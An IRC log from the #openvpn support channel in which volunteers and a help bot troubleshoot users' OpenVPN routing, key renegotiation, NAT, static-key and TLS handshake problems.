09:49 < pequalsnp> But I only need the address for the freebsd box, right?
09:50 <+EugeneKay> I'm speaking about the addresses used on the vpn
09:53 < pequalsnp> EugeneKay: I'm not sure I understand. does this concern nat?
09:53 <+EugeneKay> In the sense that it's networking
09:53 <+EugeneKay> What are you trying to do?
09:56 < pequalsnp> EugeneKay: I have a router connected directly to the internet. to this router I want to connect the freebsd box as a gateway which should route all traffic over openvpn.
09:56 <+EugeneKay> Ah
09:56 <+EugeneKay> !redirect
09:56 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
09:56 <+EugeneKay> !route
09:56 <@vpnHelper> http://ircpimps.org/redirect.png
09:56 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs
09:56 <@vpnHelper> behind the server or client
10:01 < pequalsnp> EugeneKay: nice! :) I have some reading to do... thank you!
11:36 < alcuadrado> !welcome
11:36 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
11:36 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
11:36 < alcuadrado> !logs
11:36 <@vpnHelper> "logs" is (#1) please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client (OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client (Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you don't know how to find your logs, see !logfile
11:36 < alcuadrado> !configs
11:36 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) don't forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
12:55 < madsage> greets
12:56 < madsage> hey is there a way to adjust the expiry time of keys? i'm guessing that is not recommended. but just curious
13:00 < pekster> madsage: Do you mean the symmetric encryption keys for the data channel? The public/private keys never expire, but the issued certificates have a not-valid-before and not-valid-after time
13:03 < madsage> the soft reset, TLS: tls_process: killed expiring key
13:03 < madsage> seems like it goes off avery hour?
13:03 < madsage> avery/every
13:04 < madsage> it doesn't seem interrupting but fills my logs until --mute is triggered.
13:06 < madsage> i guess i can always adjust verbosity but i like some of the other info that is provided at the same level. currently using verbosity level 4
13:07 < bla> Hellloh.
13:08 < pekster> madsage: The data channel is secured with a symmetric key (blowfish 128-bit by default, see --cipher and --keysize in the manpage) and rotates every hour by default. See the --reneg-* options to change this
13:08 < bla> I'm trying to google a way to limit access to openvpn to specific client certificate path / cn. No luck so far. Any directions?
13:09 < madsage> pekster, cool thanks man, i'll check that --reneg option out
13:10 < pekster> madsage: There are 3 variants to that, for re-keying after a period of time, bytes, or packets. The first side to hit any of the limits initiates a re-key with the peer. It is thus allowed to use --reneg-sec 0 on the client and control it strictly from the server too
13:11 < pekster> bla: See --client-connect and key off $common_name in that script. Something sh-like this might get you started: if [ "$common_name" = "Good Client" ]; then exit 0; fi; exit 1
13:11 < bla> Ah, ok, so only external script.
13:11 < bla> Thanks.
13:11 < pekster> Or revoke clients you no longer want to connect
13:12 < pekster> Optionally you can create a ccd file with the directive 'disable' in the file which disables the client
13:12 < bla> No, I have multiple openvpn servers with users split
13:12 < bla> and want only single CA
13:12 < madsage> Renegotiate data channel key after n seconds (default=3600)
13:12 < bla> client-directory? I could create files for all files and place 'disable' in DEFAULT maybe?
13:12 < madsage> nice. ok, preciate the help.
13:13 < bla> pekster, thanks, that solution rocks.
13:13 < pekster> madsage: It's good to rotate those now and then for normal operation to gain the advantages of Perfect Forward Secrecy, but you're free to increase that. On a proxy VPN tunnel I keep open for days on end, I re-key after 500M of traffic or 12h, whichever comes first
13:13 < pekster> bla: better is to use --ccd-exclusive if you're creating ccd's for allowed clients anyway
13:14 < pekster> Even better would be to create sub-CAs for your 2 VPN servers, but maybe you're trying to avoid that for some reason
13:15 < bla> I prefer simple solutions. There're not really that many clients and there's a single point for delegating privileges.
13:16 < bla> Although our next CA will be possibly a bit more complicated (at least one sub CA for VPN itself.)
13:24 < knobo`> !static
13:24 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
14:19 < knobo`> topology subnet is probably the most intuitive(?)
14:19 < knobo`> And then I can have 243 clients on a /24 subnet, right?
14:20 < pekster> knobo`: Yup, and it's recommended unless you require support for pre-2.1 clients (ie: client versions that are 6+ years old.)
14:20 < pekster> 253 clients (256 minus 1 each for the network, "broadcast" that isn't used, and the server's IP)
14:20 < knobo`> ah, right. and minus 1 for the server
14:21 < knobo`> right...
14:21 < knobo`> i wrote 243 instead of 254...
14:22 < pekster> OpenVPN is single-threaded, so you'll often run into problems actually trying to connect that many clients, depending on usage
14:42 < bla> pekster, are there any hardware servers cooperating with openvpn clients?
14:44 < pekster> I don't get your question
14:44 < pekster> OpenVPN uses the tun device which runs in the kernel, but otherwise operates in userland
15:10 < knobo`> How many clients is OK with low traffic?
15:11 < pekster> With low traffic? Probably a lot since it's just keepalive packets and re-keys going on
15:12 < pekster> Each client will eat a little RAM, but that shouldn't pose a problem except on embedded hardware
15:12 < knobo`> Everything is currently running with ssh tunnels.
15:13 < knobo`> Can you imagine?
15:14 < pekster> If you have multiple CPUs/cores you can just run multiple openvpn instances and load balance (either by purely random --remote-random or DNS means, or do some cute load-balancing by detecting how many clients are on a given server and send them to the lesser-utilized one)
15:16 < knobo`> good :)
15:18 < alcuadrado> Hi, I'm kind of new with openVPN, I've used it before, but now I bought a VPN service and I can't connect, and know nothing about troubleshooting it, and somehow it's not writing any log... I'm using it through networkmanager
15:18 < knobo`> Or wait for 3.0 (that was planned 3 years ago)
15:24 < pekster> !provider
15:24 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
15:24 < pekster> !netman
15:24 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, don't! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list
15:25 < pekster> An actual openvpn config and a log might get you further, but without access to the server config and possibly its log, it's likely hard to say why it's failing
15:29 < alcuadrado> for sure I'm not seeking free support, just a hint to learn more
15:30 < alcuadrado> so I won't use networkmanager then.. where can I read how to config it? man pages?
15:30 < pekster> Well, you've said it's not working, can't show a config file, or a log with details. My reply: "it's broken."
15:30 < pekster> !howto
15:30 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
15:31 < pekster> Your config needs to match the server's end. You might try and assume defaults, but I can't really say without seeing the server end
15:31 < alcuadrado> ohh I see
15:31 < pekster> You'll need a ca.crt either way, and a client keypair if they require it
15:31 < alcuadrado> so I think first I'll try it on windows (they provide a custom installer), if it doesn't work there I think it's safe to say that it's blocked by the network admins
15:32 < pekster> Hopefully their "custom installer" gives you proper notice of the GPL status of openvpn and a link to the source, otherwise they're in violation of the license and need to be "encouraged" to stop violating it
15:33 < alcuadrado> let's see, I'm going to windows, brb
15:40 < knobo`> famous last words..
15:46 < alcuadrado> good and bad news, they respect every license :D it doesn't work :(
15:49 < pekster> Well, from where I sit I'm happy there's not a license violation (I saw one provider that tried to "re-package" openvpn and obviously linked against it in their own dll, and had no notice or mention of openvpn anywhere...)
15:50 < pekster> Well, except the binaries and stuff of course, but from a usage perspective the hid all of that 15:59 < alcuadrado> yep, ffmpeg often has the same problem 15:59 < alcuadrado> I've seen it repacked many times 16:00 < pekster> It's fine to do that of course, but you need to note that openvpn is included, provide its license, and a link to download sources, plus any linking your project has done 16:01 < pekster> This project had an "openvpn.dll" file -- that's not part of the GPL openvpn release ;) 16:01 < pekster> And of course, no clue how they ended up building that 16:01 < pekster> I lost interest when the install crashed on my sandboxed XP VM I use for trying out "questionable" products. A VM revert and I stopped caring much 16:02 < pekster> s/install/program launch/ 16:07 < alcuadrado> that's one of the problems with open source licenses 16:07 < alcuadrado> it can be expensive and tiresome to enforce them 16:07 < alcuadrado> well, thanks for your help pekster 16:07 < alcuadrado> see you 16:07 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has quit [Quit: This conversation is over] 16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:37 -!- Orbi [~opera@109.129.18.23] has left #openvpn [] 16:43 -!- knobo` [~bohmer@174.16.9.46.customer.cdi.no] has quit [Ping timeout: 248 seconds] 16:43 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has quit [Ping timeout: 276 seconds] 16:48 -!- C-S-B [~C-S-B@86.171.238.234] has joined #openvpn 17:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 18:16 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 256 seconds] 18:41 -!- JSharpe [~JSharpe@46.23.64.90] has quit [Quit: Leaving] 18:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 
18:54 -!- C-S-B [~C-S-B@86.171.238.234] has quit [Ping timeout: 245 seconds] 18:58 -!- C-S-B [~C-S-B@86.171.238.234] has joined #openvpn 18:58 -!- newbie|2 [~tjz@bb219-74-43-126.singnet.com.sg] has quit [Quit: quit irc] 18:58 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 18:59 -!- tjz [~tjz@unaffiliated/tjz] has quit [Client Quit] 18:59 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 19:12 -!- spacebarbarian [~spacebarb@98.110.83.136] has joined #openvpn 19:13 -!- spacebarbarian [~spacebarb@98.110.83.136] has left #openvpn [] 19:13 -!- spacebarbarian [~spacebarb@98.110.83.136] has joined #openvpn 19:25 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 19:35 -!- MFSOT [~garret@24.34.166.26] has joined #openvpn 19:36 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 19:36 -!- aaaar0n is now known as ar0nic 19:44 < pulz_> im trying to automate an nfs mount after openvpn has connect, but --route-up and --up seems to call the script during the connect before the routes have been set, eg it doesnt work 19:45 < pulz_> is there any other values that can be used ? 19:48 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has quit [Quit: leaving] 19:54 -!- pinion_ is now known as pinion 19:55 -!- spacebarbarian [~spacebarb@98.110.83.136] has quit [Quit: Leaving] 20:08 < pekster> pulz_: You probably want --route-up instead 20:08 < pekster> pulz_: Maybe with --route-delay too? 20:10 < pekster> You can increase the verbosity to verb 4 and you should see the exact ordering of route additions vs script calls too 20:13 < pulz_> pekster: ended up doing a "dirty" fix 2 step scripting with script exit in script1, and it works fine (--route-up) 20:15 < pekster> Ah, that works. According to the docs --route-up is supposed to occur after routes are added (assuming you're not using --route-noexec or --route-nopull.) 
But yea, calling itself again with a re-entry format or something works too as a poor man's fork 20:17 < pekster> [ "$1" = "re-entry" ] || "$0" re-entry "$@" & && exit 0; sleep 2; shift 1; ... 20:17 < pekster> Or something 20:20 < pulz_> i saw a couple of posts on the forum also that indicated that not everything is setup with --route-up calls the script, and it seems to be correct, i couldnt ping the remote host before the script ended 20:20 < pulz_> and then route / connections was completed 20:21 < pulz_> but the quickfix seems to work fine so im happy 20:22 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 20:35 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:38 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:38 -!- MFSOT [~garret@24.34.166.26] has quit [Ping timeout: 245 seconds] 21:09 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 248 seconds] 21:27 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 21:32 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 21:34 < ceda> Hi. I'm running OpenVPN 2.2.1 on a Ubuntu server 12.04.01. On my MacBook Air with latest os X I'm running Tunnelblick 3.3beta21b 21:35 < ceda> I've tried to get the very simple static key configuration up and running, as detailed here: http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html 21:35 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net) 21:35 < ceda> both server and client machines says "all is well", but I can't ping either end 21:36 < ceda> !paste 21:36 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 21:37 < pekster> ceda: Configs from both ends, plus logs at 'verb 5' will be helpful. 
Also note that static key has no protocol handshake, so firewalls are a potential issue that will cause traffic not to reach the other side 21:37 < pekster> !configs 21:37 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 21:37 < pekster> !logs 21:37 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 21:38 < ceda> pekster: thanks, firewalls are off, I'll see if "nobind" on client is the cause. If not, I'll continue with posting my stuff. 21:39 < pekster> That will cause the client to use a dynamically-created port instead of the 1194 default. It's a good idea on clients generaly, but shouldn't be the cause of your issue without a big warning/error in the log about binding 21:40 < pekster> To be clear, that's for sourcing, not the destination port 21:47 < ceda> ok 21:47 < ceda> and no, didn't help. 
Soon to paste link to gist 21:49 < ceda> https://gist.github.com/FredrikWendt/bebee1cc75a70c16c868 21:49 <@vpnHelper> Title: client side config (at gist.github.com) 21:52 < pekster> ceda: So, if you ping the peer, you should see 'W' packets printed in the log at verb 5 (these are the openvpn tunnel packets being written) 21:53 < pekster> You should see 'R' on the server correspondoing to this meaning it was received 21:53 < pekster> If you don't, the next step is to tcpdump your interface on the server and see if the tunneled (on udp 1194) packets even come in, and verify the firewall is allowing it into the server application 21:55 < ceda> pekster: uhm, it works now! :-P 21:55 < ceda> RwrW patterns on server 21:55 < pekster> You probably want to enable the 'keepalive' option too 21:56 < pekster> Otherwise statefull firewalls (like you probably have running on your client) will refuse inbound packets after the fw decides the UDP stream is "over" 21:56 < pekster> Something like 'keepalive 10 120' tends to work well 21:56 < pekster> !keepalive 21:56 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 21:56 < ceda> well, I want a multi-user solution eventually, and have default being routed through the tunnel - I just thought I'd start with a basic simple solution 21:57 < pekster> Well, PKI isn't that much trickier to set up; just a few extra files and the PKI itself. The official howto walks you through the process: 21:57 < pekster> !howto 21:57 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:58 < pekster> Static key mode just blasts encrypted packets to the peer; it's functionally similar to an IPSec or GRE tunnel in that sense 21:59 < ceda> pekster: I used OpenVPN with pam authentication a couple of years ago 21:59 < ceda> distribute some files, and then rely on each user to know his/her credentials 22:00 < pekster> Personally I like to keep my VPN user DB separate from my system DB; LDAP is a middle-road option where you can assign users to groups and allow connections from only users in the 'VPN Access' group, for instance 22:01 < pekster> user-pass works, although you forgo the advantage of requiring the cert so that lost/stolen/guessed credentials can't be used for access 22:01 < ceda> well, this is a virtual machine and I intended to add users that could not login 22:02 < ceda> that's an acceptable risk, with PKI a leaked set of file is all that is needed which I think is more likely to happen from what I see how my colleagues uses files 22:03 < pekster> Nope, you also need the passphrase to decrypt the private key 22:03 < ceda> ah! 22:03 < pekster> Unless you store them on-disk unencrypted (solution: don't do that) 22:03 < ceda> :-) 22:03 < pekster> So, to connect in X509 mode you both need the private key and the pw to unlock it 22:04 < pekster> It's not quite dual-factor, but it requires "something you know" (the pw) to unlock the "something you have" 22:04 < pekster> Tehnically you can also add user-pass auth on top of that so the user also needs a valid user/pass too 22:05 < ceda> yes, tunnelblick helps with all of the key unlocking/decrypting I guess 22:05 < pekster> Indeed; it'll prompt for the passphrase of the key is encrypted 22:06 < ceda> or which key are we talking about - I'm thinking of generating n "client" keys (one for each colleague) 22:06 < ceda> but that's for another day 22:06 < ceda> pekster: thanks for all your help! 
22:07 < pekster> np 22:07 < ceda> just need to get the client to route default via the tunnel and I'm set for today 22:07 < pekster> !redirect 22:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 22:07 <@vpnHelper> http://ircpimps.org/redirect.png 22:10 < ceda> !def1 22:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 22:15 < ceda> !nat-linux 22:15 < ceda> took a shot :-) 22:23 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 22:23 < ceda> ah, the ! must go before -d 22:31 < pekster> !linnat 22:31 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 22:34 -!- odoacre_ is now known as odoacre 22:55 < ceda> pekster: hmm, can't get the redirect stuff to work - what should I be looking for in the client side logs when it works? 
22:55 < ceda> I don't see that the client ever changes the default route 23:06 < pekster> ceda: If you're still using a static setup it won't pull directives (you need X509 for that where the handshake and protocol exchange takes place) so you need to specify the redirect-gateway directive locally 23:06 < pekster> NAT and firewall stuff still needs to happen as before on the server 23:08 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 23:08 -!- aaaar0n is now known as ar0nic 23:20 < ceda> ah, and that explains everything. thanks again! :-) 23:29 -!- Webhostbudd [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has joined #openvpn 23:30 < Webhostbudd> any ideas why i might be getting Sun Mar 3 06:18:41 2013 TLS Error: Unroutable control packet received from [AF_INET]xxx.xxx.xxx.xxx:1194 (si=3 op=P_CONTROL_V1) 23:30 < Webhostbudd> from a client/server which were previously on 2.2 and now upgraded to 2.3 23:49 < Webhostbudd> alright, disregard the above. It seems the ssl certificates were changed out with the upgrade and don't have common names =( --- Day changed Mon Mar 04 2013 00:04 -!- dli_ [~dli@dsl-69-172-86-211.acanac.net] has quit [Remote host closed the connection] 01:56 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:44 -!- colo-work [~jt@78.142.138.4] has quit [Read error: Connection reset by peer] 02:54 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 02:58 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 256 seconds] 02:58 -!- ade_b [~Ade@koln-5d8170b5.pool.mediaWays.net] has joined #openvpn 02:58 -!- ade_b [~Ade@koln-5d8170b5.pool.mediaWays.net] has quit [Changing host] 02:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:13 -!- krzee [nobody@64.234.228.10] has joined #openvpn 03:13 -!- krzee [nobody@64.234.228.10] has quit [Changing host] 03:13 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:13 -!- mode/#openvpn [+o krzee] by ChanServ 03:24 
-!- zz_AsadH is now known as AsadH 03:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:01 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:02 -!- odoacre [~antonio@222.126.240.10] has quit [Remote host closed the connection] 04:06 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 04:09 -!- gardar_ [~gardar@gardar.net] has quit [Read error: Operation timed out] 04:36 -!- _ingsoc [~phillip@216.155.131.69] has joined #openvpn 04:36 -!- gardar [~gardar@gardar.net] has joined #openvpn 04:36 < _ingsoc> Is there an option to skip openvpn connection (as a daemon) if I'm not connecting to the Internet? 04:37 < _ingsoc> The reason I ask is because it sits there for a long time trying to connect when I boot if I'm not connected to the net. 04:43 < _ingsoc> :) 04:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:44 < _ingsoc> That's not a passive aggressive smiley. I just wanted to check if I'm still connected to the chat. 04:48 <@krzee> thats all your OS stuff 04:48 <@krzee> its your init script 04:49 <@krzee> you could short-circuit the script with a check 04:49 < _ingsoc> I'm on Debian Sid. 04:49 < _ingsoc> krzee: How would I do that? :/ 04:50 <@krzee> i dont have debian, cant look at the init scripts for ya 04:50 <@krzee> maybe #debian 04:50 <@krzee> over 1000 more people there too 04:51 < _ingsoc> Doesn't openvpn have an option to stop trying? 04:51 < _ingsoc> Or maybe lower the timeout? 04:51 <@krzee> sure, but it'll still try 04:51 <@krzee> your question isnt about openvpn, it is about how to not run an init script when offline 04:51 < _ingsoc> I don't mind it trying. 04:51 < _ingsoc> I just want to lower the wait. 04:52 <@krzee> if it IS online, and does not succeed in connecting or loses connection, you do not want it to continue reconnecting? 04:52 <@krzee> what wait? 04:52 <@krzee> openvpn isnt blocking anything, that is your debian init stuff 04:52 < _ingsoc> Hmm. 
Alright. I will go ask in Debian. 04:52 < _ingsoc> Thank you for your help! :D 04:52 <+EugeneKay> Debian's init script makes me cry 04:52 <@krzee> yw 04:53 < _ingsoc> :( 04:53 <@krzee> i never knew you were so emotionally invested in debian EugeneKay 04:53 <+EugeneKay> It's a deep-seated hatred of the OS 04:53 < _ingsoc> Help me EugeneKay! 04:53 * EugeneKay hands _ingsoc a Scientific Linux DVD 04:54 < _ingsoc> D: 04:54 * krzee hands EugeneKay a manual to hand _ingsoc as well 04:55 * EugeneKay chews on it first 04:56 -!- _ingsoc [~phillip@216.155.131.69] has left #openvpn [] 05:01 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 05:14 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 272 seconds] 05:18 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 05:33 -!- marksaitis [~marksaiti@62.49.62.180] has joined #openvpn 06:04 -!- MariusIT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 06:13 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 245 seconds] 06:22 < vistas> How do I get the Windows OpenVPN Client to remember my login credentials? My username and password are complex and it is tedious to enter them each time. Settings/Advanced Settings show no option other than caching credentials, but they are checked off and don't do what I need. 
06:44 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:45 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 06:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:14 < dropje> vistas: http://www.personalvpn.org/auto_login_openvpn.htm this is *not* a secure way to store passwords remember that 07:14 <@vpnHelper> Title: Auto connect and autologin with OpenVPN on Windows (at www.personalvpn.org) 07:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:39 -!- cyberspace- [20253@ninthfloor.org] has quit [Read error: Operation timed out] 07:41 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 07:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:57 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn 07:58 < gitsu-sa> i can't access to my openvpn server anymore x_x 07:58 < gitsu-sa> Mon Mar 4 15:57:02 2013 us=561336 Expected Remote Options String: 'V4,dev-type tun,link-mtu 1602,tun-mtu 1500,proto UDPv4,comp-lzo,keydir 0,cipher AES-256-CBC,auth SHA512,keysize 256,tls-auth,key-method 2,tls-server' 07:58 < gitsu-sa> i get a lot of: WRWRWRWRWRWRWRWRWRWRRWRWRWRWRWRWRWR 07:58 < gitsu-sa> WWWWWWWWMon Mar 4 15:58:02 2013 us=129795 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 07:59 <@ecrist> gitsu-sa: looks like someone may be blocking the openvpn connection 07:59 <@ecrist> work firewall, perhaps? 07:59 < gitsu-sa> i'm at home 07:59 < gitsu-sa> the vpn is in my net 08:02 < gitsu-sa> http://pastebin.com/raw.php?i=zW8fvUfW 08:03 < gitsu-sa> i get a TLS: Initial packet fom openvpip, sid+something 08:03 <@ecrist> can we see server and client log, please? 
08:03 <@ecrist> !logs 08:03 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 08:03 < gitsu-sa> uhm, I can access to it only by openvpn x_x 08:04 <@ecrist> uhm, I can't help you without the log 08:08 < gitsu-sa> i know that my router got a restart 08:09 < gitsu-sa> but it has a static ip, i can ping it 08:11 < gitsu-sa> well i'm going to restart it 08:11 < gitsu-sa> hope that i will find them log to debug what was the problem 08:13 <@ecrist> I'm guessing something got screwed up in the reboot, like the openvpn server didn't start, or something like that 08:14 < gitsu-sa> uhm 08:14 < gitsu-sa> but i get a package from it 08:14 < gitsu-sa> "TLS: Initial packet from $openvpn_server_ip, sid=$RANDOM $RANDOM" 08:15 < gitsu-sa> VERIFY OK: depth=1, /CN=$name_of_server_crt 08:15 < gitsu-sa> and then VERIFY OK of mine crt 08:15 <@ecrist> how about you show us the logs, like I asked? 08:15 < gitsu-sa> i can show the client log now 08:16 < gitsu-sa> !logfile 08:16 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. 
You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 08:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:18 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 08:21 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Ping timeout: 252 seconds] 08:23 -!- gitsu-sa [~gtu@adsl-ull-76-36.45-151.net24.it] has joined #openvpn 08:23 -!- gitsu-sa [~gtu@adsl-ull-76-36.45-151.net24.it] has quit [Client Quit] 08:24 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn 08:24 < gitsu-sa> http://pastebin.com/raw.php?i=5L9ACMhT 08:26 < gitsu-sa> config: http://pastebin.com/raw.php?i=BpLCYAyW 08:27 < gitsu-sa> if you can't get nothing with those client things 08:27 < gitsu-sa> i will restart the server x_x 08:34 < gitsu-sa> uhm, with the restart i solved, seems like i don't have log 08:35 < pekster> gitsu-sa: You should check the server logfile too. The client gets partway througho the TLS handshake but it then times out. Possible causes are the server rejected it for some reason, a network issue prevented successful handshake (dropped data, MTU issues, etc) 08:35 < pekster> Don't have the server log? 08:35 < gitsu-sa> http://pastebin.com/raw.php?i=rtVz2KAD 08:35 < gitsu-sa> server config 08:37 < pekster> Configs look fine. I'm wondering if something like the clock might have been off causing the server to believe the client cert was not valid or something like that 08:38 < gitsu-sa> ofc the clock was wrong 08:38 < gitsu-sa> i know that... 08:38 < gitsu-sa> it doesn't have an hardware clock 08:38 < gitsu-sa> i have a script to post-up net config 08:38 < gitsu-sa> to sync with ntp 08:38 < gitsu-sa> so this is my 'bug' 